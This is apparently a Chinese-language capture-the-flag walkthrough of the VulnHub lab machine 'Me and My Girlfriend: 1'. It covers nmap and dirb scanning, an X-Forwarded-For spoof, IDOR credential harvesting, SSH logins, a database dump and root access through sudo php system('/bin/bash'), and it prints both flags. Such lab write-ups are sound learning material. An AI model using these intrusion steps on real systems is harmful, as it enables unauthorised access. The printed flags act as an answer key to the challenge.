ME AND MY GIRLFRIEND: 1
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
主机发现
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.15
Host is up (0.00021s latency).
MAC Address: 00:0C:29:CC:B8:EE (VMware)
nmap扫描
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap --min-rate 10000 -p- 192.168.54.15
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:CC:B8:EE (VMware)
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap -sT -sV -O -p22,80 192.168.54.15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:CC:B8:EE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap -sU -p22,80 192.168.54.15
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:CC:B8:EE (VMware)
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap --script=vuln -p22,80 192.168.54.15
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /robots.txt: Robots file
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_ /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:CC:B8:EE (VMware)
web渗透
目录扫描
# yunki @ yunki in ~ [10:11:53]
$ dirb http://192.168.54.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 21 10:11:57 2023
URL_BASE: http://192.168.54.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.15/ ----
==> DIRECTORY: http://192.168.54.15/config/
+ http://192.168.54.15/index.php (CODE:200|SIZE:120)
==> DIRECTORY: http://192.168.54.15/misc/
+ http://192.168.54.15/robots.txt (CODE:200|SIZE:32)
+ http://192.168.54.15/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.54.15/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.54.15/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Mar 21 10:12:01 2023
DOWNLOADED: 4612 - FOUND: 3
查看网页
# yunki @ yunki in ~ [10:12:01]
$ curl http://192.168.54.15
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->%
# yunki @ yunki in ~ [10:15:12]
$ curl http://192.168.54.15/robots.txt
User-Agent: *
Allow: /heyhoo.txt%
# yunki @ yunki in ~ [10:15:21]
$ curl http://192.168.54.15/heyhoo.txt
Great! What you need now is reconn, attack and got the shell%
发现主页要在local访问,这里使用burp suite修改x-forwarded-for修改为localhost,然后重新访问,
注册完登录。
在url这里发现异常,修改一下id,发现内容也变了。
那就从id=1,用户密码开始尝试ssh登录。
获得初始shell
# yunki @ yunki in ~ [10:31:21]
$ sudo ssh eweuhtandingan@192.168.54.15
[sudo] yunki 的密码:
The authenticity of host '192.168.54.15 (192.168.54.15)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.15' (ECDSA) to the list of known hosts.
eweuhtandingan@192.168.54.15's password:
Permission denied, please try again.
eweuhtandingan@192.168.54.15's password:
# yunki @ yunki in ~ [10:33:34] C:130
$ sudo ssh aingmaung@192.168.54.15
aingmaung@192.168.54.15's password:
Permission denied, please try again.
aingmaung@192.168.54.15's password:
# yunki @ yunki in ~ [10:34:04] C:130
$ sudo ssh sundatea@192.168.54.15
sundatea@192.168.54.15's password:
Permission denied, please try again.
sundatea@192.168.54.15's password:
# yunki @ yunki in ~ [10:34:57] C:130
$ sudo ssh sedihaingmah@192.168.54.15
sedihaingmah@192.168.54.15's password:
Permission denied, please try again.
sedihaingmah@192.168.54.15's password:
# yunki @ yunki in ~ [10:35:44] C:130
$ sudo ssh alice@192.168.54.15
alice@192.168.54.15's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$
alice@gfriEND:~$ whoami
alice
alice@gfriEND:~$ uname -a
Linux gfriEND 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
alice@gfriEND:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:cc:b8:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecc:b8ee/64 scope link
valid_lft forever preferred_lft forever
这里获取到shell后去web目录下看,那两个php文件。
alice@gfriEND:/var/www/html$ cat config/config.php
<?php
$conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 81
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ceban_corp |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
MariaDB [(none)]> use ceban_corp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ceban_corp]> show tables;
+----------------------+
| Tables_in_ceban_corp |
+----------------------+
| tbl_users |
+----------------------+
1 row in set (0.00 sec)
MariaDB [ceban_corp]> select * from tbl_users;
+----+-----------------+----------------+-------------+------------------------------+
| id | name | username | password | email |
+----+-----------------+----------------+-------------+------------------------------+
| 1 | Eweuh Tandingan | eweuhtandingan | skuyatuh | eweuhtandingan@cebancorp.com |
| 2 | Aing Maung | aingmaung | qwerty!!! | aingmaung@cebancorp.com |
| 3 | Sunda Tea | sundatea | indONEsia | sundatea@cebancorp.com |
| 4 | Sedih Aing Mah | sedihaingmah | cedihhihihi | sedihaingmah@cebancorp.com |
| 5 | Alice Geulis | alice | 4lic3 | alice@cebancorp.com |
| 9 | Abdi Kasep | abdikasepak | dorrrrr | abdikasep@cebancorp.com |
| 12 | 123 | 123 | 123 | 123@qq.com |
| 13 | 123 | 123 | 123a | 123@qq.com |
+----+-----------------+----------------+-------------+------------------------------+
8 rows in set (0.00 sec)
MariaDB [ceban_corp]> exit
Bye
没啥有用的。
提权
alice@gfriEND:/var/www/html$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php
# 既然有php权限,那就sudo执行php,binbash吧。
alice@gfriEND:/var/www/html$ sudo /usr/bin/php -r "system('/bin/bash');"
root@gfriEND:/var/www/html# whoami
root
root@gfriEND:/var/www/html# cd /root
root@gfriEND:/root# ls
flag2.txt
root@gfriEND:/root# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~/.my_secret# whoami
root
root@gfriEND:~/.my_secret# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:cc:b8:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecc:b8ee/64 scope link
valid_lft forever preferred_lft forever
flag1:
root@gfriEND:/root# cd ~
root@gfriEND:~# ls -liah
total 36K
21088 drwxr-xr-x 4 alice alice 4.0K Mar 21 09:41 .
12 drwxr-xr-x 6 root root 4.0K Dec 13 2019 ..
21128 -rw------- 1 alice alice 10 Dec 13 2019 .bash_history
21090 -rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
21089 -rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc
21126 drwx------ 2 alice alice 4.0K Dec 13 2019 .cache
142082 drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret
21255 -rw------- 1 alice alice 69 Mar 21 09:41 .mysql_history
21091 -rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
root@gfriEND:~# cd .my_secret/
root@gfriEND:~/.my_secret# ls
flag1.txt
my_notes.txt
root@gfriEND:~/.my_secret# cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}